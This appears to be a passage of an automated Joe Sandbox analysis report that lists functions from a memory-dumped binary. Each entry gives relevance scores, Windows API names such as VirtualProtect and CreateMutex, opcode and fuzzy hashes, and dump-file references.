                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: FreeLibrary
                                                      • String ID:
                                                      • API String ID: 3664257935-0
                                                      • Opcode ID: a766f8a0e7bd2c8c12d36500e370b6cf717aaa638450d80a18f47b53e407cafa
                                                      • Instruction ID: 9dcbd581763b8f923e18211723e8aaefb42d7967fc571c6f11b79815be890e71
                                                      • Opcode Fuzzy Hash: a766f8a0e7bd2c8c12d36500e370b6cf717aaa638450d80a18f47b53e407cafa
                                                      • Instruction Fuzzy Hash: B2113C36948A46D2EA20BF04E496329B3B0F798798F904371E69E437E8CF3DD945DB10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AE72DC0 Relevance: 2.7, APIs: 2, Instructions: 151COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast
                                                      • String ID:
                                                      • API String ID: 1452528299-0
                                                      • Opcode ID: 130162f1e612a8c7bbf9229168b096cb58dc45a9e80bbc9874db3e364027be0a
                                                      • Instruction ID: 225b6d5ac48749436e989f8fe49f40bf60a1707517bcd2de96d9affeec2449f1
                                                      • Opcode Fuzzy Hash: 130162f1e612a8c7bbf9229168b096cb58dc45a9e80bbc9874db3e364027be0a
                                                      • Instruction Fuzzy Hash: 00710E36618B8586DB60EB1AE49136EB7B0F7C8B90F504175EA9D87B68DF3DD441CB00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AE7CAF0 Relevance: 1.7, APIs: 1, Instructions: 217stringCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: strrchr
                                                      • String ID:
                                                      • API String ID: 3418686817-0
                                                      • Opcode ID: 46deeca88af4f2afcebb9a4e617de638de49ea4923ecd2725507a84c711ec80f
                                                      • Instruction ID: 0d2fac8dbd9cb487b31cc02fa98b712f07b5150abf85ad8d649159914b1698ed
                                                      • Opcode Fuzzy Hash: 46deeca88af4f2afcebb9a4e617de638de49ea4923ecd2725507a84c711ec80f
                                                      • Instruction Fuzzy Hash: E9B1193660CA818AD670EB19E48236AF7A4F7C9B94F404266EA9D83B59DF3DD541CF00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AE94C00 Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: _free_nolock
                                                      • String ID:
                                                      • API String ID: 2882679554-0
                                                      • Opcode ID: b3af2ff0c18311ab22d1fc21a707ae1a8690425f7f867d5984d1b9b90b111ee8
                                                      • Instruction ID: 4bbdb512f5c19d72844c6b9d51cde0ba15fd37b12c76e43f64e8ed961afacbd9
                                                      • Opcode Fuzzy Hash: b3af2ff0c18311ab22d1fc21a707ae1a8690425f7f867d5984d1b9b90b111ee8
                                                      • Instruction Fuzzy Hash: CB51F07B658B4991EA20EB1AE49212EB7B1F7C8B94F500276EE8D47B64CF3CD451CB10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AF3E7D8 Relevance: 1.6, APIs: 1, Instructions: 104COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 3215553584-0
                                                      • Opcode ID: db93148fabc532a6c34eb6862733ff8622850cb7730be65101fd0d6c6195c713
                                                      • Instruction ID: 8599ccd6df81bc48db5aebb325244a5af8b62fbfa448b0800e3fd4222580427d
                                                      • Opcode Fuzzy Hash: db93148fabc532a6c34eb6862733ff8622850cb7730be65101fd0d6c6195c713
                                                      • Instruction Fuzzy Hash: D341E73AE05247A2FB54AB18D642278B3E0FF45758F840270DA4E877D0CF6AF452E760
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AF3E0C0 Relevance: 1.6, APIs: 1, Instructions: 74COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 3215553584-0
                                                      • Opcode ID: 0e89df1cee367fa0f0f46a6ac241d8f662de84c4c6795c4a8f44f9d2dcd22c84
                                                      • Instruction ID: a480688ffc453240d7efaf2def84cf11f808a9b9b3af4cfea1977ede38220011
                                                      • Opcode Fuzzy Hash: 0e89df1cee367fa0f0f46a6ac241d8f662de84c4c6795c4a8f44f9d2dcd22c84
                                                      • Instruction Fuzzy Hash: F1314D3AA08A47A5F7017B65C84237CE691AF84BA5FD102B5EA2D033D2CE7DE441A631
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AF41698 Relevance: 1.6, APIs: 1, Instructions: 54COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 3215553584-0
                                                      • Opcode ID: 577015f382c4b3755d8f64dd5a887aadd0f37ae10328c7424eed687849d3f455
                                                      • Instruction ID: 260b2995b9d129ab881615939362b08cbb5279339c6036e970d758fb2f17bdd2
                                                      • Opcode Fuzzy Hash: 577015f382c4b3755d8f64dd5a887aadd0f37ae10328c7424eed687849d3f455
                                                      • Instruction Fuzzy Hash: BC21D336A08A4396F760BF29D441779B3A0EB84B94F980234E75D476D5DF3CD4009B10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AF2AC60 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: HandleModule$AddressFreeLibraryProc
                                                      • String ID:
                                                      • API String ID: 3947729631-0
                                                      • Opcode ID: 1dc9139e11363fa82b7be69403f460f39e9a84a2ce977399372339b1150ab367
                                                      • Instruction ID: 6c4a6086e7e82cbb616b3b05a2d42270c71ebe7fe75031cb7f134a76a7e34a1b
                                                      • Opcode Fuzzy Hash: 1dc9139e11363fa82b7be69403f460f39e9a84a2ce977399372339b1150ab367
                                                      • Instruction Fuzzy Hash: 5121793AE05B46DAFB21BF74C4422EC77A1EB44708F944A7AD64C02B85DF38D584DBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AF2B114 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 3215553584-0
                                                      • Opcode ID: 023d0aab57ed6f467ea251b0bc75c069ffa40aacfcbe2261f6c8a82ef05c1b62
                                                      • Instruction ID: 01004a19a4fbe6c2d3101e2865dbcf06bec122edbb8b39b42545c9e19abe29e9
                                                      • Opcode Fuzzy Hash: 023d0aab57ed6f467ea251b0bc75c069ffa40aacfcbe2261f6c8a82ef05c1b62
                                                      • Instruction Fuzzy Hash: 1411A22EA0C58BA1FF52FA1594023FDE650AF45B84FD485B0EE6C47AC6CF2DE540A721
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AF2B3A0 Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 3215553584-0
                                                      • Opcode ID: d80676324fc048e8d4e4a872a728742d6b00377b6fd520cac49514b25728106e
                                                      • Instruction ID: 9fb10b66317c6d1a0cf661e42f22445756be29f31763d91986810a8e1d744b25
                                                      • Opcode Fuzzy Hash: d80676324fc048e8d4e4a872a728742d6b00377b6fd520cac49514b25728106e
                                                      • Instruction Fuzzy Hash: E001A169A0878750FA14FB5398020B9E691FF85FE0F8846B1EE6C57BD6CE3CD4429310
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AF3D534 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7afefbf03386326cba4bd6de125ee669795ec973f90e0913fdea4b7710bc3827
                                                      • Instruction ID: 46b5b60f4271260b1faf7c837b3e6d51ace93c7802e7b9ed1a2994cac5b80862
                                                      • Opcode Fuzzy Hash: 7afefbf03386326cba4bd6de125ee669795ec973f90e0913fdea4b7710bc3827
                                                      • Instruction Fuzzy Hash: 481167AAD09A47A6FB44AF64D0422ACF760EF80764FD04272E65D022D5CA7DE001AB20
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AF2AF18 Relevance: 1.5, APIs: 1, Instructions: 40COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 3215553584-0
                                                      • Opcode ID: c07a60661377560c6146fae524e41e5065d009a8dbb5852721a82c0868e09a53
                                                      • Instruction ID: 21d139198e7eecb9e4c303d51aa568e9bb3cf14b63a6b5db74b1b0b43ba65d9d
                                                      • Opcode Fuzzy Hash: c07a60661377560c6146fae524e41e5065d009a8dbb5852721a82c0868e09a53
                                                      • Instruction Fuzzy Hash: D801DF6DE0A54B61FF547A7A985337C92409F41778FA403B0E92D8B2C2CE2CE401B260
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AF3921C Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF73AF3AB79,?,?,?,00007FF73AF2AF01,?,?,?,?,00007FF73AF402A3), ref: 00007FF73AF39271
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: 4ef4a8a9c81e310ef11842bcd22d7f0a9f6f10a443543fb6a607013a95f03771
                                                      • Instruction ID: f51146e948632442e26633cc21137873acc62cc3a763f17d7b9ea9d3684f7241
                                                      • Opcode Fuzzy Hash: 4ef4a8a9c81e310ef11842bcd22d7f0a9f6f10a443543fb6a607013a95f03771
                                                      • Instruction Fuzzy Hash: 4DF0625CF0DA03A1FF5476A554A33B8E2945F89B80FCC81B4CD0E966D6DD2DE4816230
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AE74600 Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: _fread_nolock_invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 2335118202-0
                                                      • Opcode ID: c3e3381ad94b315d625f28b09079c4e3cf748ea191a82bd28328c692f6333f34
                                                      • Instruction ID: e2a5962b6b08ea9450478e9a18343b1f6df3696de2fe4cc4666ac5d75b267bbd
                                                      • Opcode Fuzzy Hash: c3e3381ad94b315d625f28b09079c4e3cf748ea191a82bd28328c692f6333f34
                                                      • Instruction Fuzzy Hash: C5011A36A08B4991EB20EB55E48271EB7A4FBC8BC8F904521EECD47B69DF7DC1508B50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AF2AF9C Relevance: 1.5, APIs: 1, Instructions: 30COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 3215553584-0
                                                      • Opcode ID: 2ee4ea5e302c4353973c3e6e1fb43efa5bc80fb753a258f7a760c2d1a5460acc
                                                      • Instruction ID: c618806f26707e514b247fc3900db3a56981c04b9d4993a9a462ce2f10882195
                                                      • Opcode Fuzzy Hash: 2ee4ea5e302c4353973c3e6e1fb43efa5bc80fb753a258f7a760c2d1a5460acc
                                                      • Instruction Fuzzy Hash: 26F0BE2DA0D94B61FA04BB6AA4031BDE2809F45390FE403B0F66D462C3CE2CE442A370
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AE65074 Relevance: 1.5, APIs: 1, Instructions: 30synchronizationCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: CreateMutex
                                                      • String ID:
                                                      • API String ID: 1964310414-0
                                                      • Opcode ID: 5bb28053021b0cd2a62d36c1000829e863951e7d25af3afc8164462e2c0a39a0
                                                      • Instruction ID: 2970caf84cbd52d4e069f6a924bb998488d496f08e26cc603e7b29e5cdb5647f
                                                      • Opcode Fuzzy Hash: 5bb28053021b0cd2a62d36c1000829e863951e7d25af3afc8164462e2c0a39a0
                                                      • Instruction Fuzzy Hash: 3B018C26204E84C5EB05AF3AC4524ACB7B4FB08F8DB085261DF885732CEF35D145C760
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AEBADE0 Relevance: 1.5, APIs: 1, Instructions: 17memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • VirtualProtect.KERNELBASE(?,?,?,?,?,?,00007FF73AEBAF20,?,?,?,?,00007FF73AEBAABE), ref: 00007FF73AEBAE07
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID:
                                                      • API String ID: 544645111-0
                                                      • Opcode ID: b234133ac9701a7e180f97e51e021304d3a985ac5e6dee729acabcbe2f3f2af1
                                                      • Instruction ID: 212e6b61ac06419e0209ebbf0ed138c66c5ad6cd687ded08bed157998b21522e
                                                      • Opcode Fuzzy Hash: b234133ac9701a7e180f97e51e021304d3a985ac5e6dee729acabcbe2f3f2af1
                                                      • Instruction Fuzzy Hash: 1EE0C97661C68197E720EF15E44521AFBB0F784788F900665EACC43A18CB7DD6549F44
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

